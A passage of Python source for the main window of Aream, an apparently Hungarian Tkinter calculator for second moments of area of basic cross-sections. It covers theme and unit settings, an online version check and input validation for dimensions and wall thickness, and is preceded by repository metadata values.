| 34.52
| 44
| 0.69409
| 121
| 863
| 4.942149
| 0.239669
| 0.401338
| 0.461538
| 0.692308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111773
| 0.22248
| 863
| 24
| 45
| 35.958333
| 0.779434
| 0.304751
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
aa48765843a3f020782cb9ca5aa79708b14245fa
| 69,849
|
py
|
Python
|
CalcGUI/MainWindow.py
|
AMSZ-BMEGPK/Aream
|
0573ef9a9380a239f26da05d7a7422940d038884
|
[
"MIT"
] | null | null | null |
CalcGUI/MainWindow.py
|
AMSZ-BMEGPK/Aream
|
0573ef9a9380a239f26da05d7a7422940d038884
|
[
"MIT"
] | null | null | null |
CalcGUI/MainWindow.py
|
AMSZ-BMEGPK/Aream
|
0573ef9a9380a239f26da05d7a7422940d038884
|
[
"MIT"
] | null | null | null |
from ast import Return
import webbrowser
import tkinter as tk
from tkinter import BooleanVar, Toplevel, ttk
from tkinter.constants import BOTH
from PIL import Image, ImageTk
from PIL import ImageGrab
import CalcFunctions as Calc
import json
from SideMenu import SideMenu
from tkvideo import tkvideo
from PlotFunctions import plot, plot_principal_axes
import shape_builder
from SettingsWindow import settings_window
from ErrorWindow import error_window
from UpdateWindow import update_window
from tkinter.filedialog import asksaveasfile
from tkinter import messagebox
import datetime as dt
from fpdf import FPDF
import numpy as np
import os
from urllib.request import urlopen
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure
import matplotlib.patches as patches
## ANIMATION WINDOW -----------------------------------------------------------------------------------------------------------------------------------------------------------
class starting_window(tk.Tk):
    """Borderless splash window: shows the AMSZ logo for 1.5 s, then destroys itself."""

    def __init__(self):
        super().__init__()
        # Remove the OS window decorations (title bar, borders).
        self.overrideredirect(1)
        # Position the window in the center of the page.
        positionRight = int(self.winfo_screenwidth()/2 - 240)
        positionDown = int(self.winfo_screenheight()/2 - 120)
        self.geometry("+{}+{}".format(positionRight, positionDown))
        # Play splash screen on tkinter widget
        self.splash_image = Image.open("AMSZ_splash.png")
        # NOTE(review): Image.ANTIALIAS was removed in Pillow 10 (replacement:
        # Image.LANCZOS) — confirm the pinned Pillow version still provides it.
        self.splash_image = self.splash_image.resize((480,240), Image.ANTIALIAS)
        # Keep a reference on self so the PhotoImage is not garbage-collected.
        self.splash_img = ImageTk.PhotoImage(self.splash_image)
        my_label = tk.Label(self, image = self.splash_img)
        my_label.pack()
        # Auto-close after 1.5 seconds.
        self.after(1500, lambda: self.destroy())
## MAIN WINDOW -----------------------------------------------------------------------------------------------------------------------------------------------------------
class main_window(tk.Tk):
# def onExit(self):
# self.quit()
def __init__(self):
    """Build the main application window.

    Sets up window geometry, state variables, theme/settings, the custom
    menubar, the side menu and the initial plot, then performs a
    best-effort online check for a newer version.
    """
    super().__init__()
    # main window opening size
    self.win_width = 1301
    self.win_height = 750
    # Current version
    self.version = 1.1
    # screen size
    self.screen_width = self.winfo_screenwidth()
    self.screen_height = self.winfo_screenheight()
    # boolean to decide if the window can fit to the screen
    self.size_ok = tk.BooleanVar(False)
    if self.win_width < self.screen_width/4*3 or self.win_height < self.screen_height/4*3:
        self.size_ok.set(True)
    # Position the window in the center of the page.
    positionRight = int(self.winfo_screenwidth()/2 - self.win_width/2)
    positionDown = int(self.winfo_screenheight()/2 - self.win_height/2)
    self.geometry("+{}+{}".format(positionRight, positionDown))
    # Variables controlling which plot decorations are drawn
    self.coordinate_on = tk.BooleanVar(False)
    self.dimension_lines_on = tk.BooleanVar(False)
    self.transformed_coordinate_on = tk.BooleanVar(False)
    self.thickness_on = tk.BooleanVar(False)
    self.coordinate_on.set(True)
    self.dimension_lines_on.set(True)
    self.plotted = tk.BooleanVar(False)
    self.shape_builder_mode = False
    self.window_open = BooleanVar(False)
    #self.valid_sol = BooleanVar(False)
    # Default unit, default theme (loaded from the settings dict)
    self.unit = settings["default_unit"]#"mm"
    self.angle_unit = settings["angle_unit"] #! to settings
    self.theme = settings["theme"]#"dark"
    self.logo_enabled = settings["logo_enabled"]
    # shape builder configuration (each flag mirrored into a BooleanVar for tk widgets)
    self.show_orig_axis = True
    self.show_orig_axis_bool = tk.BooleanVar()
    self.show_orig_axis_bool.set(self.show_orig_axis)
    self.orig_axis_dissapier = False
    self.orig_axis_dissapier_bool = tk.BooleanVar()
    self.orig_axis_dissapier_bool.set(self.orig_axis_dissapier)
    self.sb_ha_vis = True #visualizing hauptachsen in sb mode
    self.sb_ha_vis_bool = tk.BooleanVar()
    self.sb_ha_vis_bool.set(self.sb_ha_vis)
    self.calc_for_orig_axis = False
    self.calc_for_orig_axis_bool = tk.BooleanVar()
    self.calc_for_orig_axis_bool.set(self.calc_for_orig_axis)
    # Play AMSZ logo on startup (settings value is stored as the string 'True')
    self.play_logo = tk.BooleanVar(False)
    if self.logo_enabled == 'True':
        self.play_logo.set(True)
    else:
        self.play_logo.set(False)
    # Colors
    if self.theme == "dark":
        self.colors = DARK_THEME
    else:
        self.colors = LIGHT_THEME
    ## Window ----------------------------------------------------------------
    self.title(f"Aream {self.version}")
    if self.size_ok.get() == False:
        self.state("zoomed") # Fullscreen
    self.geometry(f"{self.win_width}x{self.win_height}")
    self.configure(bg=self.colors['main_color'])
    self.minsize(width=200, height=200)
    self.tk.call('wm', 'iconphoto', self._w, tk.PhotoImage(file='logo_A.png'))
    # self.iconbitmap("AMSZ.ico")
    self.menu_is_on = False
    self.create_menubar(self.shape_builder_mode, self.menu_is_on)
    # Canvas for drawing
    self.canvas = None
    # Side Menu
    self.sm = SideMenu(self)
    self.sm.pack(side=tk.LEFT, padx = (20,10), pady = 20, fill=tk.Y)
    # self.sm.pack(side=tk.LEFT, fill=tk.Y)
    # angle_unit on pressing enter
    self.bind('<Return>', self.calculate)
    plot(self, None, False, False, False, False, self.colors, self.angle_unit)
    # Checking for updates — best effort only.
    # BUG FIX: the download/parse previously ran unguarded, so starting the
    # app without a network connection (or after a page-layout change that
    # makes find() return -1 and float() raise) crashed the whole GUI.
    try:
        url = "https://www.mm.bme.hu/amsz/index.php/python-masodrendu-nyomatek-szamito-felulet/"
        page = urlopen(url)
        html_bytes = page.read()
        html = html_bytes.decode("utf-8")
        s = str(html)
        index = s.find("Legújabb verzió: ")
        index_after = s.find("<br>", index, index+50)
        index_version = index + 17
        latest_version = s[index_version:index_after]
        latest_version = float(latest_version)
        if latest_version != self.version:
            update_window(self)
    except Exception:
        # Offline or unexpected page markup: skip the update check silently.
        pass
## USEFUL FUNCTIONS -----------------------------------------------------------------------------------------------------------------------------------------------------------
def feedback(self):
    """Open the online feedback questionnaire in the default web browser."""
    webbrowser.open("https://forms.gle/gMP69MTgbtey9T5V8")
def help(self):
    """Open the project's help/landing page in the default web browser."""
    webbrowser.open("https://www.mm.bme.hu/amsz/index.php/python-masodrendu-nyomatek-szamito-felulet/")
def create_menubar(self, shape_builder_mode, menu_is_on):
    """Build (or rebuild) the custom menubar canvas at the top of the window.

    Args:
        shape_builder_mode: When True, the forms/help buttons are shifted
            right to make room for the wider "basic" button artwork.
        menu_is_on: When True an earlier menubar exists and is detached
            before the new one is created; otherwise ``self.menu_is_on`` is
            flipped so later calls know a menubar exists.
    """
    if menu_is_on:
        # A menubar already exists: detach it before rebuilding.
        self.menu_canvas.pack_forget()
    else:
        self.menu_is_on = True
    ## custom menubar -----------------------------------------------------------------------------------------------------------------------------------------------------------
    self.menu_canvas = tk.Canvas(self, bg=self.colors['secondary_color'], highlightthickness=0, height=26)
    self.menu_canvas.pack(fill=tk.X)
    base = self.colors['path']

    def add_button(attr, stem, x, command):
        # One hover-aware image button. The PhotoImage refs are stored on
        # ``self`` both to keep them alive (Tk requirement) and because the
        # <Enter>/<Leave> handlers re-read the attributes at event time --
        # build_shape() swaps "<attr>_img" to retheme the change/basic button.
        setattr(self, attr + "_img", tk.PhotoImage(file=f"{base}menubar/{stem}.png"))
        setattr(self, attr + "_hover_img", tk.PhotoImage(file=f"{base}menubar/{stem}_hover.png"))
        item = self.menu_canvas.create_image(x, 0, anchor=tk.NW, image=getattr(self, attr + "_img"))
        setattr(self, attr, item)
        self.menu_canvas.tag_bind(item, '<Button-1>', lambda e: command())
        self.menu_canvas.tag_bind(item, '<Enter>',
                                  lambda e: self.menu_canvas.itemconfig(item, image=getattr(self, attr + "_hover_img")))
        self.menu_canvas.tag_bind(item, '<Leave>',
                                  lambda e: self.menu_canvas.itemconfig(item, image=getattr(self, attr + "_img")))

    add_button("sol_save_button", "sol_save", 0, self.save_file)
    add_button("setting_button", "settings", 167, lambda: settings_window(self))
    # Preload the "basic" artwork; build_shape() swaps it onto change_button.
    # (Was loaded with a stray extra '/' in the path -- normalized here.)
    self.basic_button_img = tk.PhotoImage(file=f"{base}menubar/basic.png")
    self.basic_button_hover_img = tk.PhotoImage(file=f"{base}menubar/basic_hover.png")
    add_button("change_button", "change", 261, self.build_shape)
    # The "change" button is wider in shape-builder mode, shifting what follows.
    if not shape_builder_mode:
        forms_posx = 167 + 94 + 104
    else:
        forms_posx = 167 + 94 + 118
    help_posx = forms_posx + 97
    add_button("forms_button", "forms", forms_posx, self.feedback)
    add_button("help_button", "help", help_posx, self.help)
def theme_change(self, theme):
    """Switch the UI between the dark and light theme.

    Applies the matching palette to the app and the side menu, persists the
    choice in the module-level ``settings`` dict, then destroys and manually
    re-initializes the whole window so every widget picks up the new colors.

    Args:
        theme: "dark" or "light"; anything else prints an error.

    Returns:
        -1 on an unknown theme name, otherwise None.
    """
    if self.theme != theme:
        self.theme=theme
        if self.theme=="dark":
            self.colors=DARK_THEME
            self.sm.change_color(DARK_THEME)
            # if self.plotted==True:
            #     plot(self, self.sm.shape, self.coordinate_on.get(), self.dimension_lines_on.get(), self.transformed_coordinate_on.get(), self.thickness_on.get(), self.colors)
        elif self.theme == "light":
            self.colors=LIGHT_THEME
            self.sm.change_color(LIGHT_THEME)
            # if self.plotted==True:
            #     plot(self, self.sm.shape, self.coordinate_on.get(), self.dimension_lines_on.get(), self.transformed_coordinate_on.get(), self.thickness_on.get(), self.colors)
        else:
            print("ERROR: Unknown Theme")
            return -1
        self.configure(bg=self.colors['main_color'])
        # Persist the selection so the next start restores the same theme.
        settings['theme']=self.theme
        # NOTE(review): full window restart to re-apply colors everywhere;
        # calling __init__ on the destroyed widget is fragile -- confirm.
        self.destroy()
        self.__init__()
        #TODO: canvas color???? + plot
        print(f"Theme set to {theme}")
def unit_change(self, unit_type, unit):
    """Change the active unit and refresh every matching unit label.

    Args:
        unit_type: "degree" selects the angle unit; anything else selects
            the length unit.
        unit: The new unit text (e.g. "rad", "mm") shown on the labels.
    """
    if unit_type == "degree":
        self.angle_unit = unit
    else:
        self.unit = unit
    # Update the unit labels of the main side menu.
    for control in self.sm.controls:
        if control["unit_type"] == unit_type:
            control["unit"].config(text=unit)
    # The shape-builder side menu only exists after builder mode was opened
    # at least once. Was a bare ``except: None`` that swallowed *every*
    # error; narrowed to the one expected failure (missing ``self.sb``).
    try:
        sb_controls = self.sb.controls
    except AttributeError:
        return
    for control in sb_controls:
        if control["unit_type"] == unit_type:
            control["unit"].config(text=unit)
def build_shape(self):
    """Toggle between the standard calculator view and the shape-builder view.

    Opening: hides the calculator side menu, creates the builder side menu
    and builder canvas, swaps the menubar "change" button artwork to
    "basic", and destroys any existing plot canvas.
    Closing: tears the builder widgets down, restores the calculator side
    menu with its default combobox, resets the plot and swaps the menubar
    button artwork back to "change".
    """
    if not self.shape_builder_mode:
        print("opening sb")
        self.shape_builder_mode = True
        self.create_menubar(self.shape_builder_mode, self.menu_is_on)
        self.sm.pack_forget()
        self.sb_sm = shape_builder.sb_side_menu(self)
        self.sb_sm.pack(side=tk.LEFT, fill=tk.Y, padx = (20,10), pady = 20)
        self.sb = shape_builder.shapeBuilder(self, self.sb_sm)
        # Swap the menubar "change" button to the "basic" artwork; the
        # hover bindings read these attributes at event time.
        self.change_button_img = tk.PhotoImage(file=f"{self.colors['path']}menubar/basic.png")
        self.change_button_hover_img = tk.PhotoImage(file=f"{self.colors['path']}menubar/basic_hover.png")
        self.menu_canvas.itemconfig (self.change_button, image=self.change_button_img)
        if self.plotted==True:
            # Remove the embedded plot canvas of the previous figure.
            self.canvas._tkcanvas.destroy()
        self.sb.pack(expand=tk.YES, fill=tk.BOTH, padx = (10,20), pady = 20)
    else:
        print("closing sb")
        self.sb.pack_forget()
        self.sb_sm.pack_forget()
        self.shape_builder_mode = False
        self.create_menubar(self.shape_builder_mode, self.menu_is_on)
        self.sm.pack(side=tk.LEFT, fill=tk.Y, padx = (20,10), pady = 20)
        # calling = eval(f'self.sm.{self.sm.shape.lower()}_click')
        # calling()
        self.sm.combo_clear()
        # self.combo_rectangle.grid(row=1, column=0, columnspan=5)
        # Restore the default (no shape selected) combobox image/label.
        self.sm.combo_default_img = tk.PhotoImage(file=f"{self.colors['path']}combobox/combo_default.png")
        self.sm.combo_default = tk.Label(self.sm.canvas, image=self.sm.combo_default_img, bg=self["background"], activebackground=self["background"])
        self.sm.combo_default.bind('<Button-1>', func=lambda e:self.sm.combo_click())
        self.sm.combo_default.grid(row=1, column=0, columnspan=5)
        self.sm.combo_default["border"] = "0"
        self.sm.clear()
        # self.sm.combo_clear()
        # self.sm.combo_rectangle.grid_forget() ## TODO eval: turns a func-name string into code
        # self.sm.combo_default.grid(row=1, column=0, columnspan=5)
        # self.sm.calling
        # Reset plot state and draw the empty placeholder plot.
        self.plotted = False
        self.sm.shape = None
        plot(self, None, False, False, False, False, self.colors, self.angle_unit)
        self.change_button_img = tk.PhotoImage(file=f"{self.colors['path']}menubar/change.png")
        self.change_button_hover_img = tk.PhotoImage(file=f"{self.colors['path']}menubar/change_hover.png")
        self.menu_canvas.itemconfig (self.change_button, image=self.change_button_img)
def choose_object(self, shape = None):
    """Switch the side menu to the requested shape and redraw the plot.

    Does nothing when ``shape`` is already selected; unknown (or None)
    shapes reset the selection and only redraw the empty plot.
    """
    self.dimensions = {
        "a": 2,
        "b": 1,
        "d": 1
    }
    if shape == self.sm.shape:
        # Already showing this shape; nothing to rebuild.
        return 0
    if self.canvas is not None:
        self.sm.clear()
    # Each known shape maps to the side-menu method that rebuilds its controls.
    switchers = {
        "Rectangle": "change_to_recrangle",  # (sic) -- actual SideMenu method name
        "Circle": "change_to_circle",
        "Ellipse": "change_to_ellipse",
        "Isosceles_triangle": "change_to_isosceles_triangle",
        "Right_triangle": "change_to_right_triangle",
    }
    switcher_name = switchers.get(shape)
    if switcher_name is None:
        self.sm.shape = None
        print("Ez az alakzat még nincs definiálva...")
    else:
        self.sm.shape = shape
        getattr(self.sm, switcher_name)()
        if shape in ("Isosceles_triangle", "Right_triangle"):
            print(self.sm.shape)
    plot(self, self.sm.shape, self.coordinate_on.get(), self.dimension_lines_on.get(), self.transformed_coordinate_on.get(), self.thickness_on.get(), self.colors, self.angle_unit)
def get_entry(self, number_of_entries):
    """Read and validate the dimension entries of the side menu.

    Converts decimal commas to dots, collects the first ``number_of_entries``
    values (plus three transform values when the transformed coordinate
    system is enabled) into ``vissza``, and validates the wall-thickness
    entry per shape when the thickness option is on.  Invalid entries get
    an error background color and a Hungarian error message in the result
    labels, and ``None`` is appended to ``vissza`` so the caller can detect
    the failure.

    Returns:
        tuple: ``(vissza, t)`` -- ``vissza`` is a list of floats (``None``
        entries on error); ``t`` is the wall thickness (0 when the
        thickness option is off, ``None`` on a thickness error).
    """
    vissza = []
    # --- shape dimension entries ---------------------------------------
    for i in range(number_of_entries):
        if i >= 1 and self.sm.shape == "Circle": #! Ugh, this is ugly...
            # NOTE(review): circles skip one control slot here -- presumably
            # because of the circle's control layout; confirm.
            i+=1
        if self.sm.controls[i]["entry"].get().replace(',','.') == "":
            # Empty field: mark it and report an input error.
            print("Hiba")
            self.sm.controls[i]["entry"].config({"background": self.colors['error_color']})
            # NOTE(review): this inner loop rebinds the outer loop variable ``i``;
            # harmless here only because ``i`` is not used again this iteration.
            for i in self.sm.indicators:
                i.config(text="")
            self.sm.result1.config(text="Hiba a bemeneti adatokban!")
            vissza.append(None)
        elif float(self.sm.controls[i]["entry"].get().replace(',','.')) > 0:
            # Positive number: accept it and restore the normal background.
            vissza.append(float(self.sm.controls[i]["entry"].get().replace(',','.')))
            self.sm.controls[i]["entry"].config({"background": self.colors['entry_color']})
        else:
            # Zero or negative dimension: mark it and report an input error.
            print("Hiba")
            self.sm.controls[i]["entry"].config({"background": self.colors['error_color']})
            for i in self.sm.indicators:
                i.config(text="")
            self.sm.result1.config(text="Hiba a bemeneti adatokban!")
            vissza.append(None)
    # --- transformed-coordinate inputs ---------------------------------
    # Reads three more entries (stored after the shape dimensions).  No
    # positivity check here: offsets/angle may be any value.
    if self.transformed_coordinate_on.get():
        for i in range(1,4):
            if self.sm.shape == "Circle":
                i += 1
                if self.sm.controls[i]["entry"].get().replace(',','.') == "":
                    print("Hiba")
                    self.sm.controls[i]["entry"].config({"background": self.colors['error_color']})
                    for i in self.sm.indicators:
                        i.config(text="")
                    self.sm.result1.config(text="Hiba a bemeneti adatokban!")
                    vissza.append(None)
                else:
                    vissza.append(float(self.sm.controls[i]["entry"].get().replace(',','.')))
                    self.sm.controls[i]["entry"].config({"background": self.colors['entry_color']})
            if self.sm.shape != "Circle":
                i += 1
                if self.sm.controls[i]["entry"].get().replace(',','.') == "":
                    print("Hiba")
                    self.sm.controls[i]["entry"].config({"background": self.colors['error_color']})
                    for i in self.sm.indicators:
                        i.config(text="")
                    self.sm.result1.config(text="Hiba a bemeneti adatokban!")
                    vissza.append(None)
                else:
                    vissza.append(float(self.sm.controls[i]["entry"].get().replace(',','.')))
                    self.sm.controls[i]["entry"].config({"background": self.colors['entry_color']})
    # --- wall thickness -------------------------------------------------
    if self.thickness_on.get():
        if self.sm.shape == "Circle":
            print("Kor szamitas")
            t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
            d = float(self.sm.controls[0]["entry"].get().replace(',','.'))
            # NOTE(review): ``or t is not None`` makes this condition
            # effectively always true once float() above succeeded --
            # presumably ``and`` was intended; confirm before changing.
            if 0 < t < d/2 or t is not None:
                print("kor lehetseges")
                t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
                self.sm.controls[-1]["entry"].config({"background": self.colors['entry_color']})
            else:
                print("Hiba")
                self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
                for i in self.sm.indicators:
                    i.config(text="")
                self.sm.result2.config(text="Hiba a falvastagságban!")
                vissza.append(None)
                t = None
        elif self.sm.shape == "Right_triangle":
            print("Derekszogu haromszog szamitas")
            t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
            a = float(self.sm.controls[0]["entry"].get().replace(',','.'))
            b = float(self.sm.controls[1]["entry"].get().replace(',','.'))
            # Triangle geometry (angle, hypotenuse, medians) used below to
            # derive the candidate thickness limits t1..t3 -- presumably the
            # centroid-to-side distances; confirm derivation.
            phi = np.arctan(b/a)
            c = np.sqrt(a**2 + b**2)
            print('phi: ' + str(phi*180/np.pi))
            print('c: ' + str(c))
            s1 = np.sqrt(b**2 + (a/2)**2)
            s2 = np.sqrt(a**2 + (c/2)**2 - 2*a*(c/2)*np.cos(phi))
            s3 = np.sqrt(a**2 + (b/2)**2)
            print('s2: ' + str(s2))
            print('s3: ' + str(s3))
            t1 = a/3
            t2 = b/3
            beta = np.arccos( ( (s2/3)**2 - (2*s3/3)**2 - (c/2)**2 ) / ( -2 * (2*s3/3) * (c/2) ) )
            print('beta: ' + str(beta))
            t3 = (2*s3/3)*np.sin(beta)
            print('t1: ' + str(t1))
            print('t2: ' + str(t2))
            print('t3: ' + str(t3))
            # selecting the smallest
            t_min = min(t1, t2, t3)
            print('legkisebb: ' + str(t_min))
            if 0 < t:
                try:
                    t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
                    self.sm.controls[-1]["entry"].config({"background": self.colors['entry_color']})
                except:
                    print("Hiba")
                    self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
                    for i in self.sm.indicators:
                        i.config(text="")
                    self.sm.result1.config(text="Hiba a bemeneti adatokban!")
                    self.sm.result2.config(text="Hiba a falvastagságban!")
                    vissza.append(None)
                    t = None
            # NOTE(review): chained comparison == (0 < t and t >= t_min);
            # raises TypeError if ``t`` became None in the except above -- confirm.
            if 0 < t >= t_min:
                self.sm.controls[0]["entry"].config({"background": self.colors['error_color']})
                self.sm.controls[1]["entry"].config({"background": self.colors['error_color']})
                self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
                for i in self.sm.indicators:
                    i.config(text="")
                self.sm.result1.config(text="Hiba a bemeneti adatokban!")
                self.sm.result2.config(text="Hiba a falvastagságban!")
                vissza.append(None)
        elif self.sm.shape == "Isosceles_triangle":
            print("Egyenloszaru haromszog szamitas")
            t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
            a = float(self.sm.controls[0]["entry"].get().replace(',','.'))
            b = float(self.sm.controls[1]["entry"].get().replace(',','.'))
            # Same limit derivation as the right triangle, with the symmetry
            # s3 == s2 and t3 == t2.
            phi = np.arctan(b/ (a/2))
            c = np.sqrt((a/2)**2 + b**2)
            print('phi: ' + str(phi*180/np.pi))
            print('c: ' + str(c))
            s1 = b
            s2 = np.sqrt(a**2 + (c/2)**2 - 2*a*(c/2)*np.cos(phi))
            s3 = s2
            print('s2: ' + str(s2))
            print('s3: ' + str(s3))
            t1 = a/3
            beta = np.arccos( ( (s2/3)**2 - (2*s3/3)**2 - (c/2)**2 ) / ( -2 * (2*s3/3) * (c/2) ) )
            print('beta: ' + str(beta))
            t2 = (2*s2/3)*np.sin(beta)
            t3 =t2
            print('t1: ' + str(t1))
            print('t2: ' + str(t2))
            print('t3: ' + str(t3))
            # selecting the smallest
            t_min = min(t1, t2, t3)
            print('legkisebb: ' + str(t_min))
            if 0 < t:
                try:
                    t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
                    self.sm.controls[-1]["entry"].config({"background": self.colors['entry_color']})
                except:
                    print("Hiba")
                    self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
                    for i in self.sm.indicators:
                        i.config(text="")
                    self.sm.result1.config(text="Hiba a bemeneti adatokban!")
                    self.sm.result2.config(text="Hiba a falvastagságban!")
                    vissza.append(None)
                    t = None
            # NOTE(review): same TypeError hazard as in the right-triangle branch.
            if 0 < t >= t_min:
                self.sm.controls[0]["entry"].config({"background": self.colors['error_color']})
                self.sm.controls[1]["entry"].config({"background": self.colors['error_color']})
                self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
                for i in self.sm.indicators:
                    i.config(text="")
                self.sm.result1.config(text="Hiba a bemeneti adatokban!")
                self.sm.result2.config(text="Hiba a falvastagságban!")
                vissza.append(None)
        else:
            # Rectangle (and, for now, every other shape).
            print("Teglalap szamitas (egyenlore minden mas is)")
            try:
                t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
                self.sm.controls[-1]["entry"].config({"background": self.colors['entry_color']})
            except:
                print("Hiba")
                self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
                for i in self.sm.indicators:
                    i.config(text="")
                self.sm.result1.config(text="Hiba a bemeneti adatokban!")
                self.sm.result2.config(text="Hiba a falvastagságban!")
                vissza.append(None)
                t = None
            a = float(self.sm.controls[0]["entry"].get().replace(',','.'))
            b = float(self.sm.controls[1]["entry"].get().replace(',','.'))
            # The wall thickness must stay below half of both sides.
            if 0 < t < a/2 and 0 < t < b/2:
                try:
                    t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
                    self.sm.controls[-1]["entry"].config({"background": self.colors['entry_color']})
                except:
                    print("Hiba")
                    self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
                    for i in self.sm.indicators:
                        i.config(text="")
                    self.sm.result1.config(text="Hiba a bemeneti adatokban!")
                    self.sm.result2.config(text="Hiba a falvastagságban!")
                    vissza.append(None)
                    t = None
            else:
                # Highlight exactly the offending side(s); a == b marks both.
                if 0 < t >= a/2 and a == b:
                    self.sm.controls[0]["entry"].config({"background": self.colors['error_color']})
                    self.sm.controls[1]["entry"].config({"background": self.colors['error_color']})
                    self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
                    for i in self.sm.indicators:
                        i.config(text="")
                    self.sm.result1.config(text="Hiba a bemeneti adatokban!")
                    self.sm.result2.config(text="Hiba a falvastagságban!")
                if 0 < t >= a/2 and 0 < t < b/2:
                    self.sm.controls[0]["entry"].config({"background": self.colors['error_color']})
                    self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
                    for i in self.sm.indicators:
                        i.config(text="")
                    self.sm.result1.config(text="Hiba a bemeneti adatokban!")
                    self.sm.result2.config(text="Hiba a falvastagságban!")
                    vissza.append(None)
                elif 0 < t >= b/2 and 0 < t < a/2:
                    self.sm.controls[1]["entry"].config({"background": self.colors['error_color']})
                    self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
                    for i in self.sm.indicators:
                        i.config(text="")
                    self.sm.result1.config(text="Hiba a bemeneti adatokban!")
                    self.sm.result2.config(text="Hiba a falvastagságban!")
                    vissza.append(None)
                elif t >= a/2 and t >= b/2:
                    self.sm.controls[0]["entry"].config({"background": self.colors['error_color']})
                    self.sm.controls[1]["entry"].config({"background": self.colors['error_color']})
                    self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
                    for i in self.sm.indicators:
                        i.config(text="")
                    self.sm.result1.config(text="Hiba a bemeneti adatokban!")
                    self.sm.result2.config(text="Hiba a falvastagságban!")
                    vissza.append(None)
                else:
                    self.sm.controls[0]["entry"].config({"background": self.colors['error_color']})
                    self.sm.controls[1]["entry"].config({"background": self.colors['error_color']})
                    self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
                    for i in self.sm.indicators:
                        i.config(text="")
                    self.sm.result1.config(text="Hiba a bemeneti adatokban!")
                    self.sm.result2.config(text="Hiba a falvastagságban!")
                    vissza.append(None)
    else:
        # Thickness option off: solid section.
        t = 0
        #self.sm.e2.config({"background": self.colors['entry_color']})
    return vissza,t
'''
def get_entry(self, number_of_entries):
vissza = []
for i in range(number_of_entries + self.transformed_coordinate_on.get() * 3):
if i >= 1 and self.sm.shape == "Circle": #! Jujj de csúnya...
i+=1
if self.sm.controls[i]["entry"].get().replace(',','.') == "":
print("Hiba")
self.sm.controls[i]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
vissza.append(None)
elif float(self.sm.controls[i]["entry"].get().replace(',','.')) > 0:
vissza.append(float(self.sm.controls[i]["entry"].get().replace(',','.')))
self.sm.controls[i]["entry"].config({"background": self.colors['entry_color']})
else:
print("Hiba")
self.sm.controls[i]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
vissza.append(None)
if self.thickness_on.get():
if self.sm.shape == "Circle":
print("Kor szamitas")
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
d = float(self.sm.controls[0]["entry"].get().replace(',','.'))
if 0 < t < d/2 or t is not None:
print("kor lehetseges")
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
self.sm.controls[-1]["entry"].config({"background": self.colors['entry_color']})
else:
print("Hiba")
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
t = None
elif self.sm.shape == "Right_triangle":
print("Derekszogu haromszog szamitas")
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
a = float(self.sm.controls[0]["entry"].get().replace(',','.'))
b = float(self.sm.controls[1]["entry"].get().replace(',','.'))
phi = np.arctan(b/a)
c = np.sqrt(a**2 + b**2)
print('phi: ' + str(phi*180/np.pi))
print('c: ' + str(c))
s1 = np.sqrt(b**2 + (a/2)**2)
s2 = np.sqrt(a**2 + (c/2)**2 - 2*a*(c/2)*np.cos(phi))
s3 = np.sqrt(a**2 + (b/2)**2)
print('s2: ' + str(s2))
print('s3: ' + str(s3))
t1 = a/3
t2 = b/3
beta = np.arccos( ( (s2/3)**2 - (2*s3/3)**2 - (c/2)**2 ) / ( -2 * (2*s3/3) * (c/2) ) )
print('beta: ' + str(beta))
t3 = (2*s3/3)*np.sin(beta)
print('t1: ' + str(t1))
print('t2: ' + str(t2))
print('t3: ' + str(t3))
# selecting the smallest
t_min = min(t1, t2, t3)
print('legkisebb: ' + str(t_min))
if 0 < t:
try:
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
self.sm.controls[-1]["entry"].config({"background": self.colors['entry_color']})
except:
print("Hiba")
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
t = None
if 0 < t >= t_min:
self.sm.controls[0]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[1]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
elif self.sm.shape == "Isosceles_triangle":
